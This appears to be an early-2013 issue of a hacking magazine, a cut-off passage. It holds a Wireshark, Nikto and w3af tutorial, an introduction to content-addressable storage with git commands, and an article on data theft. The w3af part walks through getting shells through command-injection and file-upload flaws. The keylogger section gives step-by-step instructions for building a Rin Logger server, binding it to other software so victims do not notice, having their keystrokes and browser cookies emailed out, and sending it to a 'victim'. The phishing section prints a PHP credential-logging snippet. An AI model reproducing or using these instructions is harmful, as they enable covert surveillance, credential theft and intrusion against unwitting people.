Embed Size (px)
DESCRIPTION
Hack In Sight Magazine
Citation preview
24th of January 2013
01/2012
1
24th of January 2013
01/2012
3
Dear Readers,
After a long time of preparation we can proudly
present you the first Hack Insight issue. We
decided to start it with Hacking Passwords
because it is the base and first step for every IT
security expert who's developing his hacking
skills.
Two articles have been prepared by Mr. Vikas
Kumar who is an experienced ethical hacker. He
described in details how to use Wireshark, Nicto
and W3af. His research will help us to understand
how to sniff the network traffic and use the most
known network's protocol analyzer - Wireshark.
The second article concerns hacking methods.
Mr.Kumar presented how is the keylogger
working and how to create your own phishing
page. You should definitely check this section out
and think of the danger during daily computer
usage.
Third article written by Mr. Miroslav Ludvik and
Mr. Radek Pilar refers to Content Adressed
Storage. In this issue we will be able to see an
introduction to secure data archiving. In the
second issue, as Miroslav promised, he will
present the content about first vendor
technology - you definitely cannot miss this
article.
This first publication wouldn't be possible without
our magazine's friends who spent a lot of their
working time to take care of this issue. Special
thanks for Ms. Sheryl Checkman, Mr. Timothy
Coleman and Mr. Ty Donaldson. We are grateful
that thanks to your professional advice, attention
to the grammatical correctness and creation of
the creative cover and essential images we can
now read this magazine.
Enjoy the hacking!
Hack Insight Team
[Hack]in(Sight)
Editorial Section:
Authors:
Vikas Kumar,, Miroslav
Ludvik, Radek Pilar.
Proof-reading:
Timothy Coleman, Nina
Takahashi, Agata
Brzozowska.
DTP:
Sheryl Checkman, Ty
Donaldson.
Publisher:
Hack Insight Press Paweł
Płocki
www.hackinsight.org
Editor in Chief:
Paweł Płocki
All trade marks presented in the magazine were used only for informative purposes.
www.hackinsight.org
• Page 6: Wireshark is the world's foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.
Advanced Usage of Wireshark, Nicto and W3af.
• Page 24: Welcome to the mini-series of articles about modern ways of data archiving. This article will be about CAS (Content Addressable Storage). The next one will be about archiving and trustworthy repositories. Then, there will be a few articles about existing solutions and finally, their comparison.
CAS - introduction
• Page 27: Data stealing is the illegal access (by reading, editing, or copying) of data without the data owner’s authorization. In other words, if a company’s server has been accessed by a hacker it is a case of data theft. Even reading the mails of your colleague would be also taken as a crime in the eyes of law. It is irrelevant whether you later used this data for misdeeds or not – what counts is that data that is not yours has been accessed – without prior permission of its authorized user who may also be its creator.
Data Stealing. Data Theft Prevention. Phishing.
Table Of Content
24th of January 2013
01/2012
5
Advanced Usage of Wireshark, Nicto and
W3af.
I. Wireshark:
Wireshark is the world's foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.
Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.
Figure 1.image of Wireshark with logo
Wireshark, formerly known as Ethereal, is one of the most powerful tools in a network security analyst's toolkit. As a network packet analyzer, Wireshark can peer inside the network and examine the details of traffic at a variety of levels, ranging from connection-level information to the bits comprising a single packet. This flexibility and depth of inspection allows the valuable tool to analyze security events and troubleshoot network security device issues.
Packet Analysis Made Easy
Visually rich, powerful LAN analyzer
Quickly access very large pcap files
Professional, customizable reports
Advanced triggers and alerts
Fully integrated with Wireshark
The Role of A Network Protocol Analyzer Network Protocol Analysers like Wireshark let us look at the behaviors of network protocols. This can be useful for 3 main reasons:
1. Observing the network traffic generated by protocols, services, applications etc, helps us gain a better understanding of how these various things work.
2. The ability to observe exactly what is happening over a network can also often help us gain a better understanding of a problem we are troubleshooting.
3. Finally the ability to monitor network traffic can help us identify threats to or breaches of network security.
How to sniff network traffic and why sniff the network? The phrase "sniff the network" may conjure Orwellian visions of a Big Brother network administrator reading people's private email messages. Before anyone uses Wireshark, an organization should ensure that it has a clearly defined privacy policy that spells out the rights of individuals using its network, grants permission to sniff traffic for security and troubleshooting issues, and states the organization's policy requirements for obtaining, analyzing and retaining network traffic dumps. Anyone who uses a tool like Wireshark without first obtaining the necessary permissions may quickly find themselves in hot water legally.
However, as a security professional, there are two important reasons to sniff network traffic. First, peering into the details of packets can prove invaluable when dissecting a network attack and designing countermeasures. For example, if a denial of service occurs, Wireshark can be used to identify the specific type of attack. The tool can then craft upstream firewall rules that block the unwanted traffic. The second major use of Wireshark is to troubleshoot security devices. Specifically, I regularly use it to troubleshoot firewall rules. If systems running Wireshark are
connected to either side of a firewall, it's easy to see which packets successfully traverse the device and identify whether the firewall is the cause of connectivity problems.
That being said, it's important to remember that Wireshark can be used for good or for evil, as is the case with many security analyzers. In the hands of a network or security administrator it's a valuable troubleshooting tool. In the hands of someone with questionable ethics, however, it's a powerful eavesdropping tool that enables someone to view every packet that traverses the network.
Downloading & Installing Wireshark If you don’t already have Wireshark Installed on your computer you can download it from the Wireshark Website at http://www.wireshark.org.
Figure 2. Available Interfaces
Figure 3. Interface Selection for capturing data packets.
Security Note: It is best practice to download software only from the official site of the developer, there are many other sites which offer Wireshark downloads, my advice is to avoid them as you can’t know whether the software you are downloading has been altered in a malicious way by the third party site. The installation is straight forward, and for most people you should be able to run the installer and simply click next through the whole process. Running a simple “packet capture” Once Wireshark is installed, start it up and you'll be presented with the blank screen in which you are to select your interface on which you want to capture data packets is shown below:
24th of January 2013
01/2012
7
Click the Start button next to the name of the interface on which you wish to capture traffic, and immediately you will see Wireshark filling up with traffic as shown on picture below.
Figure 4. Wireshark traffic Interpreting the results with Wireshark color codes Each line in the top pane of the Wireshark window corresponds to a single packet seen on the network. The default display shows the time of the packet (relative to the initiation of the capture), the source and destination IP addresses, the protocol used and some information about the packet. You can drill down and obtain more information by clicking on a row. This causes the bottom two window panes to fill with information.
The middle pane contains drill-down details on the packet selected in the top frame. The "+" icons reveal varying levels of detail about each layer of information contained within the packet. In the example above, I've selected a DNS response packet. I've expanded the DNS response (application layer) section of the packet to show
that the original was requesting a DNS resolution for www.cnn.com, and this response is informing us that the available IP addresses include 64.236.91.21. The bottom window pane shows
the contents of the packet in both hexadecimal and ASCII representations.
Wireshark color codes Color is your friend when analyzing packets with Wireshark. Notice in the example above that each row is color-coded. The darker blue rows correspond to DNS traffic, the lighter blue rows are UDP SNMP traffic, and the green rows signify HTTP traffic. Wireshark includes a complex color-coding scheme (which you can customize). The default settings appear below:
Figure 5. Wireshark color coding
Wireshark is already capturing data packets, so lets test if it will work supposed to ping with any system in the network so Wireshark will capture ICMP data packets:
Figure 6. Pinging from ip 192.168.152.130 to target system ip 192.168.152.128
Figure 7. ICMP data packet filtration with echo request & reply Wireshark is already capturing data packets, so let’s test if it will work suppose I was logging in www.jammuclubjammu.com
Figure 8. Putting credentials in login account
24th of January 2013
01/2012
9
Filter data packets. For this tutorial I have used HTTP as it is shown below. NOTE: there are so many protocols you can use to filter data packets (e.g. FTP)
Figure 9. Finding HTTP data packets through filtration. Now look for Post, select it Right click or go to Analyze menu and then select Follow TCP Stream
Figure 10. Finding HTTP data packets through filtration. You should now see this window, just scroll down until you see username and password. As you can see, I managed to capture my username and password.
Figure 11. TCP Stream window will show credentials FTP Data Packet Capturing with login Credentials
Now we are going to capture data packets of FTP protocol so for that we are using a cmd prompt for login into ftp account of jammuclubjammu.com web server.
Figure 12. FTP Login with cmd. We have entered credential and side by side our Wireshark is capturing all the data packets.
Figure 13. Login into FTP account with credentials.
24th of January 2013
01/2012
11
Now we will resolve the data packets of FTP protocol for which first of all we all will filter all ftp data packets which is given below:
Figure 14. FTP data packet filtration. Now we will resolve these data packets for which we are to right click on ftp data packet and click on follow TCP Stream
Figure 15. FTP data packet resolved and credentials in txt format.
Filtering Packets If you’re trying to inspect something specific, such as the traffic a program sends when phoning home, it helps to close down all other applications using the network so you can narrow down the traffic. Still, you’ll likely have a large amount of packets to sift through. That’s where Wireshark’s filters come in.
The most basic way to apply a filter is by typing it into the filter box at the top of the window and clicking Apply (or pressing Enter). For example, type “ip.src == 192.168152.130” and you’ll see only IP Source 192.168.152.130 data packets. When you start typing, Wireshark will help you autocomplete your filter.
Figure 16. Data Packet filtration of ip.scr == 192.168.152.130 Next filtration “DNS”
Figure 17. Data Packet filtration of DNS
24th of January 2013
01/2012
13
Inspecting Packets Click a packet to select it and you can dig down to view its details.
Figure 18. Data Packet Inspecting You can also create filters from here — just right-click one of the details and use the Apply as Filter submenu to create a filter based on it.
Figure 19. Apply as Filtration. Wireshark is an extremely powerful tool, and this tutorial is just scratching the surface of what you can do with it. Professionals use it to debug network protocol implementations, examine security problems and inspect network protocol internals.
II. Nicto:
Introduction Nikto is an open source web server scanner “which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files or CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers." The good thing about Nikto is that it easy to use and performs scanning faster. Nikto is coded in Perl and written by Chris Sullo and David Lodge. Although not all checks are really a big security problem but most are like XSS (Cross Site Scripting) Vulnerabilities, phpmyadmin logins, etc. Nikto alerts and gives you security tips in order to prevent your website from various attacks.
Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible, and is fairly obvious in log files. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).
Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.
So if you are using Backtrack to practice pen-testing then you needn't worry about installing Nikto as it is already there in Backtrack (Its there even in Backtrack 4). But if you aren't using Backtrack, then you can
download Nikto from the website http://www.cirt.net/nikto2 Make sure you have Perl installed because Nikto is a Perl Script. You can run Nikto in two ways:
1. Go to Applications>Backtrack>Vulnerability Assessment>Web Application Assessment>Web Vulnerabilities Scanner>Nikto
2. cd /pentest/web/nikto/
Simply , root@bt:cd /pentest/web/nikto root@bt:/pentest/web/nikto# ./nikto.pl -H
Figure 20. Nikto Options of help
Figure 21. Nikto Options of help
24th of January 2013
01/2012
15
root@bt:/pentest/web
/nikto# ./nikto.pl -
host 10.x.x.52 -
output kioptrix_80.txt
If we give command ./nikto.pl -Help or perl nikto.pl -Help then we get details and all options. Simply We are going to scan a target website, because we are pentesting it. So easy:
Figure 22. Nikto scanning target website
Figure 23. Nikto Scanning result.
Now you will get a output file in txt format which you can open for reading purpose by giving steps root@bt:/pentest/web/nikto# . / Niktorat kioptrix_80.txt kioptrix_80
Figure 24. Nikto output file. In order to run a simple vulnerability scan against a target you just have to specify a host address along with a port number. For example, perl nikto.pl -h 10.10.15.27 -p 32333
Figure 25. Nikto scanning a web server based on port.
24th of January 2013
01/2012
17
In the above command :
“-h” switch implies host address.
“-p” switch implies port number. The above command runs a vulnerability scan against the host 10.10.155.27. But since we specified the port number as 32333,Nikto scans that particular port only. Now if you want the scan to include multiple ports you have to specify a port range : perl nikto.pl -h 10.10.15.27 -p 1024-10000 What if you don't specify any port? perl nikto.pl -h 10.10.15.27
Figure 25. Nikto scanning a web server without specifying port In this case Nikto just scans port 80. Are these the only switches that Nikto has to offer (i.e. “-h” and “-p”)? No it offers wide variety of switches. Just type perl nikto.pl to check the amount of options Nikto offers.
Figure 26. Nikto scanning options for scanning target website to use.
III. W3af: Security is key point for every effective business, either you are running your own website or you are at job to manage the web application for your company you have to do little penetration testing to check the security of web application. Now a days exploit are available and update on daily basis for different web application services. While doing a penetration testing a pen tester must consider these exploit for different vulnerabilities. To find vulnerabilities is not enough a pen-tester must check the parallel exploits that are available publicly for different services. w3af (Web Application audit and attack
framework) is a framework for auditing and exploitation of web applications. In this series of articles we will be looking at almost all the features that w3af has to offer and discuss how
to use them for Web application Penetration testing. In the first part of this series we will be
working with w3af console and getting ourselves familiar with the commands. We will also be looking at the different types of plugins that w3af has to offer and discuss how to use them for optimal performance.
W3af stands for web auditing and attack framework. I have heard some say that it is the
metasploit for web applications. W3af is basically a free open source web application scanner. W3af has many plugins that are divided into attack, audit, exploit, discovery, evasion, brute force, mangle and a few others. The code is well commented and written in python so writing your own exploits and plugins should be trivial.
Some of the major features of w3af are:
1. It has plugins that communicate with each other. For eg. the discovery plugin in w3af looks for different url’s to test for vulnerabilities and passes it on to the audit plugin which then uses these URL’s to search for vulnerabilities.
2. It removes some of the headaches involved in Manual web application testing through its Fuzzy and Manual request generator feature. It can also be configured to run as a MITM proxy. The requests intercepted can be sent to the request generator and then manual web application testing can be performed using variable parameters
3. It also has features to exploit the vulnerabilities that it finds.
Figure 27. W3af (Web Application Attack and Audit Framework)
step is to give the url to w3af and scan it for XSS vulnerabilities. Open up w3af GUI. Once it is open, on the left hand side, we can see an option to choose from various profiles.
Figure 28. W3af profile selection.
We can choose any profile from the list depending on our need, as well as the time availability. These profiles already has configurations to use some specific plugins for a particular task. For e.g if we if look the profile OWASP_TOP10, we will see that it uses several of the Audit, Grep and Discovery plugins to
perform its tasks.
Figure 29. W3af Plug-ins selection for scanning target url
For the time being, we are going to use an Empty profile as we just want to check a single url for an XSS vulnerability. Note that this is usually not the way in which we will use the w3af framework. In a real world environment, we will choose some specific discovery plugins to find different url’s to check for injections, auth plugins to automatically log in to forms and crawl ahead, grep plugins to
look for interesting information in the response, and audit plugins to scan for vulnerabilities in the found injection points.
Type in the url in the target field and choose the xss plugin from the audit plugins.
Figure 30. URL scanning
Once this is done, click on Start. This will start the scan on the given url. As we can see from the output, it found a XSS vulnerability.
24th of January 2013
01/2012
19
Figure 31. W3af scanning result If you are interested in knowing what actually happened, go to the Results Tab. Click on xss on the left side. On the right side, you can see a description of how the vulnerability was found.
On the bottom right, you can also see the request and response which led to the identification of the vulnerability. It is a very good practice to look at the requests and responses sent through by w3af as this lets us know what’s going on under the hood.
Figure 32. W3af Vulnerability description So basically what happened was that w3af sent JavaScript strings to every parameter in the url, and then checked for those strings in the response. In case of stored XSS, w3af takes a note of the injected
string and makes a request again to the url looking for that string. If it finds that string, then a stored XSS has been identified.
Let’s now use an OS commanding vulnerability to
obtain a shell on the system. From the OS
commanding section in the w3af test
environment, choose a url and give it as target to
w3af. Under the audit plugins section, check the
OS commanding plugin.
Figure 33. W3af OS Command for obtaining
shell of target URL.
Figure 34. OS Command vulnerability output Once this is done, click on start to launch the vulnerability scan. As we can see from the output, w3af identified an OS commanding vulnerability.
w3af supports detection of both simple and blind OS commanding vulnerability. In simple OS commanding, it sends a simple command to every parameter and then looks for a response to that command in the output. In case of blind OS commanding in which the response is not present in the output, it uses time delays to identify if a vulnerability is present. For e.g if it sends a command which delays the response for some seconds, and if we note a delay in the output, we
Figure 35. Vulnerability identification
can say that a blind OS commanding vulnerability is present. Again, in the results section, we can see the request and the response which led to identification of the vulnerability.
w3af also allows us to exploit vulnerabilities. If we go under the Exploit section, we can see the identified vulnerability in the Vulnerabilities section. If we click on it, we can see that osCommandingShell in the Exploits section turns black. This is an indication that the vulnerability can be exploited using the osCommandingShell plugin in w3af. Right click on osCommandingShell and click on Exploit ALL vulns.
24th of January 2013
01/2012
21
Figure 36. W3af vulnerability exploitation.
Once this is done, if the vulnerability is exploited successfully, we will get a shell on the target machine. We can see the list of shells on the right side. Note that it is not possible to get a shell in case of every vulnerability.
Just double click on the shell and you are all set and ready to go.
Figure 37. Shell execution
Similarly, let’s use a file upload vulnerability to get a shell. Give the vulnerable url as a target to w3af. Make sure, the fileUpload plugin is checked in the audit plugins list.
Figure 38. FileUpload Plug-ins list. Also make sure to check the extensions option in the fileUpload plugin. Since in some cases, the web
application allows only some specific extensions, it would be favorable to add those extensions to the list as well.
Figure 39. Specifying extensions for web application Click on Start. As we can see from the output, w3af identified a file Upload vulnerability.
Figure 40. FileUpload vulnerability identification. Click on the Results Tab. You can see that w3af tried to upload a file named w3af_dt4LqT.html. It did this by sending the file object in the uploadedfile parameter. It then looked for these files in common
directories like uploads etc. If the file is found, then it can be said that a Insecure File Upload vulnerability exists. However, this is not always the case as most of the web application filter files based on their extension. To bypass this w3af has templates for some of the most common file extensions. These templates have valid extensions but have a section that can be replaced with scripting code. The figure
below shows the files with different extensions present in w3af.
Figure 41. FileUpload templets If we open up any of these files with Kate, we can see the content inside it. As we can see from the figure below, the file template.png has a string of A’s in its comment section. This string can actually be replaced by scripting code like php.
Figure 42. String replacement. With all of these basics out of the way, let’s exploit this vulnerability using the fileUploadShell plugin. You can also set the configuration of these plugins by right clicking on them and clicking on Configure the plugin.
As we can see from the figure below, the vulnerability was successfully exploited and we got a shell on the target machine.
24th of January 2013
01/2012
23
Figure 43. Vulnerability exploitation. Similarly you can perform tests for many other exploits like Local File Inclusion, Remote File Inclusion, SQL Injection etc.
VIKAS KUMAR (ISHAN) is one of the leading computer security experts available in India. VIKAS KUMAR born on 26 July 1990 in a town called Meerut, UP (India). VIKAS KUMAR started his Group “hackers4u” on Facebook in year 2010 and in two years he bangs the World Wide Web with good computer ethical hacking articles and going to launch the website on Cyber Security & Ethical Hacking and working with a Anti-Hacking Community “I-hackers4u”. The 22 year old guy have the capability to compete with the people best in the business so called” Ethical Hacking”. Workshops and Seminars: VIKAS KUMAR have trained more than 3000 people from all around the world, from countries like India, Dubai, Sudan, United
Kingdom, Thailand, Nigeria, Shri Lanka, Kenya, Australia, Kazakhstan, Canada, Ghana, United States, South Africa, China, Malaysia, Singapore, Omen, Yemen, Indonesia, Korea, Iran and etc. www.cyber-hunt.com Blog: - www.cyber-hunt2012.blogspot.com
LinkedIn Profile:- https://www.linkedin.com/profile/view?id=71569482&trk=tab_pro Facebook:- https://www.facebook.com/hackers4u BackTrack Fan Club Page:-https://www.facebook.com/pages/Cyber-Hunt-BackTrack-Fan- Club/395372283859684?ref=tn_tnmn Facebook Page:- https://www.facebook.com/vikas7852?ref=tn_tnmn Email ID:- [email protected] [email protected]
About the author
CAS – introduction
Abstract:
Welcome to the mini-series of articles about modern ways of data archiving. This article will be about CAS
(Content Addressable Storage). The next one will be about archiving and trustworthy repositories. Then,
there will be a few articles about existing solutions and finally, their comparison.
Typical filesystems use name and path to
uniquely identify astored object (which can be
file, directory, symlink, etc.). This approach has
few advantages, but also few disadvantages that
CAS systems aim to fix. CAS, as its name implies,
identifies the object by its content. Of course, it
wouldn't be practically feasible to use the whole
content of the object – in that case, storing the
file would be pointless. Instead of it, CAS systems
use cryptographic hash of the content. So, if we
want to access the file with content „Balance for
the year 2012“, instead of file:
/home/accountant/docs/balance2012.doc
or on Windows:
C:\Users\Accountant\Documents\balance2012.doc
we accessobject identified by string:
cd52089ea948bd42fece0ebba0c91b5ae68169e4
which is, in this example SHA-1 hash of its
content. Because with that approach, you'd lose
some information (filename, author, creation
date), the CAS system attaches metadata to
objects.
The first CAS system ever was introduced in 2003
by US company EMC under name Centera, but
was immediately followed by similar products
from other vendors like HP, Hitachi, Oracle/Sun,
Dell and others. Today, CAS is used as a de-facto
standard for a long-term data archiving. CAS-
based solutions have several advantages. Since
the system works with file hashes instead of
filenames, it is much more difficult to tamper
data (even from the sysadmin perspective): It is
really easy to save a different file with the same
name, but really difficult to save a different file
with the same hash. And on the other side – two
files with the same contents will have the same
hash – therefore, there will be only one copy
stored in the system. This effectively supersedes
file-level deduplication, the non-existence of
multiple copies of the same file is implied by the
basic principles of the system itself. However, the
CAS systems have their disadvantages as well. If
the user wants to modify already stored object, it
involves copying its contents, modification,
reading the whole file, hash calculation and final
write. Even if we change just a single byte from
the multi-megabyte file, we still need to re-read
the whole file and compute a new hash.
However, considering current prices of the
hardware, this disadvantage vanishes and is
merely theoretical. The second mentioned
disadvantage is the existence of hash collisions.
Since the hash functions generates for the input
of arbitrary length output of fixed length, loss of
information occurs. Therefore there exists
multiple different inputs with the same hash. And
it depends only on the specific implementation of
the CAS system, how it will handle the collision.
The odds collision will occur can be estimated
from the length of hash function output. For
example, the MD5 hashing algorithm always
returns 128bit value. Therefore,
24th of January 2013
01/2012
25
chance the two randomly chosen objects will
have the same hash is 1:2^128. 2^128 is also the
theoretical upper limit CAS system can store.
However, if someone will want to create his own
file, different from ours, with the same hash
(preimage attack), he'll need approx. 2^123
computations. The worst situation happens when
someone will want to create two arbitrary files
with the same hash – in that case, only 2^21
operations will be necessary. Fortunately, there
exists more secure algorithms like SHA-1 – which
has output size of 160bits, with no known
reimage attack faster than bruteforce (2^160)
and with fastest collision-discovery attack with
complexit 2^61. The dangers of using this
hashing algorithm is almost non-existent with
current technology and knowledge. And in case
you've thought about distributed version control
systems when reading this article – you were
right. Most of the distributed VCSs use some kind
of CAS as backend. I'll use some low-level git
commands to demonstrate basic principles of
CAS:
Listing 1. Creating empty git repository.
# Create empty git repository
$ git init
Initialized empty Git repository in /tmp/example/.git/
# Objects are stored in .git/objects
$ ls .git/objects/
info pack
# Create example file
$ cat > foo.txt << EOF
Lorem ipsum dolor sit amet.
EOF
# Store example file to database
$ git hash-object -w foo.txtd2cf010d36ff3f5a199c335135f37ca40822b35b
# We try to manually calculate SHA1 hash of the file(note.: git prefixes the contents with:
"blobcontent_len\0x00")
$ echo -e "blob 28\0Lorem ipsum dolor sit amet."|sha1sum
d2cf010d36ff3f5a199c335135f37ca40822b35b -
# We see hashes are equal. Let's look at .git/objects
$ ls .git/objects/*
Listing 2. Creating empty git repository II
Enterprise solutions use CAS as a backend for a more complex system implementing data replication,
etention, secure shredding and other functions – these will be mentioned in following articles.
Mr. Miroslav Ludvik
graduated at Czech Technical University in 1996.
In 2005 he succesfully defended his Ph.D. thesis
on Data Security in Comupter Networks and I was
awarded Ph.D. degree. In 2000 he participated on
securing the International Monetary Fund
conference in Prague. He provides counseling to
Ministry of Interior of the Czech Republic and
Czech Data Protection Office. He provides also
counseling for private sector and among my client
are e.g. bank and prestigious legal fi ms. He
teaching on prestige private Czech University and
cooperate with University of Žilina. He holds an
office of Technical Director in the 4safety, a.s
company.
Mr. Radek Pilar
is currently studying at Czech Technical
University, Prague and is employed as a storage
consultant n the 4safety, a.s company.
.git/objects/d2:
cf010d36ff3f5a199c335135f37ca40822b35b
# Using the content hash, we can request the content.
$ git cat-file -p d2cf010d36ff3f5a199c335135f37ca40822b35b
Lorem ipsum dolor sit amet.
# Filename is not important
$ cp foo.txt bar.txt
$ git hash-object -w bar.txt
d2cf010d36ff3f5a199c335135f37ca40822b35b
# But the content is
$ echo "foobar" > foo.txt
$ git hash-object -w foo.txt
323fae03f4606ea9991df8befbb2fca795e648fa
# And the original file will remain unchanged
$ git cat-file -p d2cf010d36ff3f5a199c335135f37ca40822b35b
Lorem ipsum dolor sit amet.
$ git cat-file -p 323fae03f4606ea9991df8befbb2fca795e648fa
foobar
About the authors
24th of January 2013
01/2012
27
Data Stealing. Data Theft Prevention.
Phishing.
Data stealing is the illegal access (by reading, editing, or copying) of data without the data owner’s authorization. In other words, if a company’s server has been accessed by a hacker it is a case of data theft. Even reading the mails of your colleague would be also taken as a crime in the eyes of law. It is irrelevant whether you later used this data for misdeeds or not – what counts is that data that is not yours has been accessed – without prior permission of its authorized user who may also be its creator.
"One of the way of hacking Data Stealing is DDoSes which has evolved from being a blunt-forced attack to being a sophisticated diversionary attack disguising another attack." Sources said that financial service companies handling vast amount of data are most susceptible to these tactics.
Figure 1: Data Theft.
In the past year, for example, phishing attacks have been directed at IT administrators at European banks. These eventually enabled malware to penetrate the banks' systems and steal login credentials.
As soon as the criminals had the login details, they launched the DDoS attacks against the banks. This was carefully timed so that it occurred on a Friday afternoon when IT departments were thinly staffed.
"Once the attack was launched, the IT department predictably moved resources to deal with DDoS attack,".
While this was happening, the cybercriminals launched the real attack, which allowed them to grab and clone private data that could be used to steal money.
They then handed the operation over to the monetization team, who created ATM cards, debit cards and credit cards, which were handed out to money mules.
The cybercriminal gang hired individual contractors who took the cards to ATM machines and drained $9m in 48 hours from a selection of accounts in cities across the world.
Types of Data Theft
Data can be stolen in many ways. Below you can see a few examples showing the ways of data theft. Hacking: This is by far the most common way of stealing data with the least chances of getting caught. A hacker gets into a system where he or she is not supposed to be and steals whatever data he needs. Hackers find their ‘gate way’ through gaps in the security system or by hoodwinking gullible employees / surfers in order to gain access to a system.
Posing: Appearances can be deceiving. The attractive website that has popped up offering you a great holiday treat may actually be a data thief trying to get into your system under the ‘mask’ of a piece of harmless spam. In a case of corporate data theft last year, the thief posed as a potential customer and got an entry to a company’s data bank through the computer of an employee who did not suspect anything in his eagerness to catch a potential client. Remote Access: Is the cursor moving about on its own even when you have not touched the mouse? Does the indicator show that a program is running even when you are not working on anything and have no windows opened? Do not ignore the symptoms – a data thief is already sitting in your computer. Remote access allows the thief to gain control of your machine from wherever he or she is and operate it, steal data from it, and even distribute virus from it! Spyware: Spyware is often brought in by adware. The thief may not sit in your system, but your key strokes or mouse clicks would be spied upon, revealing what you are doing and ‘reading’ the data as you put it in. And you have opened the gate by clicking on an innocent looking ad. Podslurpling: Music is now stored in iPods for almost all domestic users. You would usually not suspect an employee rocking to music while working as usual. The thief knows this and he is using the iPod to obtain data outputs from the computer where it is plugged in. Blue Snarfing: Bluetooth devices have become popular in a very short while. Using his or her Bluetooth-enabled cell phone or laptop, the data thief lifts data from a restricted computer in silence and mostly unnoticed. Thumsucking: Another tiny and dangerous device is the USB storage drive. All that an employee needs to do is plug in a pen drive, and 2 GB of data would flow in quietly into the pocket from the computer.
Prevent Data Theft
At any time of day or night, a huge amount of data is being stored, retrieved and transferred in
the average company or organization. As a responsible user, you must know how to protect your data and prevent data theft from mobile devices. The following targets for thieves and intruders are:
USB thumb drive 3G mobile phone network Wireless LAN Removable hard disk Notebook computer Portable personal digital device like MP3,
PDA, Phones Printer output etc. Personal information such as bank
account or details Customer database Confidential/sensitive business
information e.g. tender information and quoted prices.
The Following are some useful security tips for preventing data theft:
Protect your mobile devices Data theft sometimes happens when you
outsource your IT services. Learn how to prevent data loss from IT outsourcing.
Review the access control policy Encrypt your data. Protect your wireless network. Secure your company network. Conduct security risk assessments and
regular security audits.
Figure 2: Preventing from Data Theft.
24th of January 2013
01/2012
29
Keylogger
Key logger software is a
computer monitoring system
that allows you to record
entire activities performed on
your computer system. Key
logger software has an ability
to monitor online chat
conversation details, visited
websites, incoming and
outgoing emails and other
online activities performed on
your pc. The log file created
by the key logger can be sent
to a specified receiver. Some
key logger programs will also
record any e-mail addresses
you use and Web
site URLs you visit.
Key loggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, key loggers can also be embedded n spyware allowing your information to be transmitted to an unknown third part. Computer monitoring
software works in invisible
mode and does not appear on
the Desktop, Add/Remove
Programs, Control panel and
even in the hidden during the
installation path folders.
Keyloggers software provides
facility to send details of
recorded activities at user specified email address. Free keylogger
download is available on the website.
How to hack ID's with Rin Logger
Run the keylogger file on your pc and click on “Create new”
Figure 3: Create New for creating server.exe file.
Now, enter the information as follows:
Email address: your email address (gmail recommended)
Account Password: Password of your Email address.
Keylogger Recipients: Enter your Email address
Click on next
Figure 4: Set information for getting keylogs.
Now, enter the time duration between two
emails. If you set it to 2 minutes, you will receive
emails after every 2 minutes. Hit on Next.
Figure 5: Set timing for getting keylogs.
Now, change Install keylogger to “Enabled”.
Name the file anything you want and select
Installation path as “Application data”.
Click on next option of downloader setup which
will help you to download your files off the
internet and internet launch it.
Figure 7: Set Download Setup.
Create a custom message for making your victim
fool and click on next.
Figure 8: Set Dialog setup for setting message
for victim.
Click on website enable viewer for getting all the
updates of all the website which are being visited
by victim.
24th of January 2013
01/2012
31
Figure 9: Set Website Viewer option for update
of web links.
Select this option for binding our file with other
file and click on next .
Figure 10: Bind your server.exe file with other file.
This option can help you retrieving passwords
from cookies of web browser and click on next.
Figure 11: Set option for stealing cookies from web browser.
Use this option to get the administrative control
of your victim system and as per your choice and
requirement just enable and click on next.
Figure 12: Use administrative control options.
You can use all other options according to your
needs. But, I am focusing only on the important
aspects. Hit on Next until you see this option:
Hit on “?” button besides every textbox to
generate random product information. Hit on
Next.
Figure 13: Bind your server.exe file with other file.
Now, hit on “Save As” and select the path where
you want to save your keylogger server file. Click
on “Compile”. Done!!!
Figure 14: Save server.exe file.
That’s it. You have successfully created a
keylogger server file. Now, simply send this file to
your friend. You can use the Binder within this
keylogger or can even opt for Iexpress binder to
bind this keylogger server to any .exe file may be
software or so. This will remove any chances of
doubt on victim’s side.
Figure 15: Successfully created file.
Now, simply send this file to your victim via email.
Once the victim runs our keylogger, we will get
key logs every 2min via email as shown
Thus, the victim will run the file considering it as a
normal software installation and during this
process, our sent keylogger server will install
itself silently in background without any victim’s
knowledge.
After keylogger server installation, you will start receiving all victim’s passwords like this:
24th of January 2013
01/2012
33
Figure 16: Online logs on email ID.
Countermeasures
The effectiveness of countermeasures varies, because keyloggers use a variety of techniques to capture data and the countermeasure needs to be effective against the particular data capture technique. For example, an on-screen keyboard will be effective against hardware keyloggers, transparency will defeat some screen loggers - but not all of them - and an anti-spyware application that can only disable hook-based keyloggers will be ineffective against kernel-based keyloggers.
Moreover, keylogger software authors may be able to update the code to adapt to countermeasures that may have proven to be effective against them.
Anti keyloggers
An anti keylogger is a piece of software specifically designed to detect keyloggers on a computer, typically comparing all files in the computer against a database of keyloggers looking for similarities which might signal the presence of a hidden keylogger. As anti keyloggers have been designed specifically to detect keyloggers, they have the potential to be
more effective than conventional anti-virus software; some anti-virus software do not consider certain keyloggers a virus and under some circumstances a keylogger can be considered a legitimate piece of software.
Figure 17: Anti-Keylogger for removing keylogger file.
Phishing
You must have come across many fake login
pages/scamming pages which are often used to
hack IDs. Phishing is the easiest and the most
"unethical way of hacking”. That true phishing is
not something great which only a few can do,
that is why it makes it unethical. But whatever it
might be, hacking is hacking and there is
obviously a need to know more of this type of
exploitation. Before we go into the details let us
first see what phishing is all about.
header ('Location:
http://www.gmail.com');$handle =
fopen("log.txt", "a");foreach($_POST as
$variable => $value) { fwrite($handle,
$variable); fwrite($handle, "=");
fwrite($handle, $value); fwrite($handle,
"\r\n");}fwrite($handle,
"\r\n");fclose($handle);exit;?>
Figure 18: How Phishing works.
Phishing is a way of deceiving your victim by
making him login through one of your webpages
which is a clone of the original one. By doing it,
